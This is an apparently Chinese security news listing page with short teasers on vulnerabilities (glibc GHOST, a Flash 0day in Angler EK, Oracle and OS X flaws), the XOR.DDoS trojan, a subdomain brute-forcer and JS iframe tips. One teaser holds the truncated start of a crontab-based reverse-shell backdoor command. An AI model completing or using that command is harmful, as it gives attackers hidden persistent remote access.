最近万豪酒店因拦截酒店会议中心的客户WiFi通讯而频见报端。作为万豪酒店的一名顾客,我想知道他们是怎么“拦截”访问我在他们系统中的敏感信息的。由于web服务的安全性常被忽略,从他们的万豪国际安卓app...
网络安全
网络安全
网络安全
Flash爆出高危0day漏洞,影响绝大多数windows版本
目前作者只给出了简单的描述,具体的技术细节我们会继续跟进。法国的安全研究者Kafeine发现在最新的Angler EK(一个挂马工具包)中集成了三个flash的漏洞用于挂马,其中两个是已经修复的漏洞,...
神兵利刃
子域名爆破工具——SubBrute
SubBrute的设计初衷是为了创造一个最快、最精确的子域名枚举工具。SubBrute的神奇之处在于,他用了开放的DNS解析器作为一种代理来规避DNS线速。(https://www.us-cert.g...
漏洞分享
Linux Glibc幽灵漏洞允许黑客远程获取系统权限
幽灵漏洞是Linux glibc库上出现的一个严重的安全问题,他可以让攻击者在不了解系统的任何情况下远程获取操作系统的控制权限。目前他的CVE编号为CVE-2015-0235。什么是glibcglib...
JS实现刷新iframe的方法
<iframe src="1.htm"name="ifrmname" id="ifrmid"></iframe>方案...
js实现关闭子页面父页面同时刷新
做项目的时候,需要实现这样一个功能:弹出一个窗口,对该窗口进行操作,操作结束后关闭该窗口,对父窗口进行刷新操作;纠结了小一会儿呢.查了一下资料,然后自己实践一下,成功了,下面将我查到的资料分享一下吧;...
一条命令实现无文件兼容性强的反弹后门
最好用一个不常见的用户执行,任务写入/var/spool/cron/$username (crontab -l;echo '*/60 * * * * exec 9<> /...
漏洞分享
CVE-2015-0393:Oracle发布严重安全漏洞预警
疑似后门:漏洞CVE-2015-0393江湖人称“Oracle漏洞猎手”的David Litchfield在去年6月11日发现过Oracle一个疑似后门的严重漏洞CVE-2015-0393。日前Lit...
苹果OS X的Spotlight文件搜索含泄漏用户隐私漏洞
德国的科技新闻网站Heise近日报道称苹果最新版桌面操作系统OS X 10.10(Yosemite 优胜美地)提供的Spotlight文件搜索功能含有可能泄露用户资料的漏洞。美国IDG News的测试...
可感染Linux平台的最新木马XOR.DDoS
一种名为“XOR.DDoS”的新型木马出现,该木马能够感染32位和64位的Linux系统,通过安装rootkit来隐藏自身,并可通过DDoS攻击形成僵尸网络。XOR.DDoS木马原理杀毒软件公司Ava...
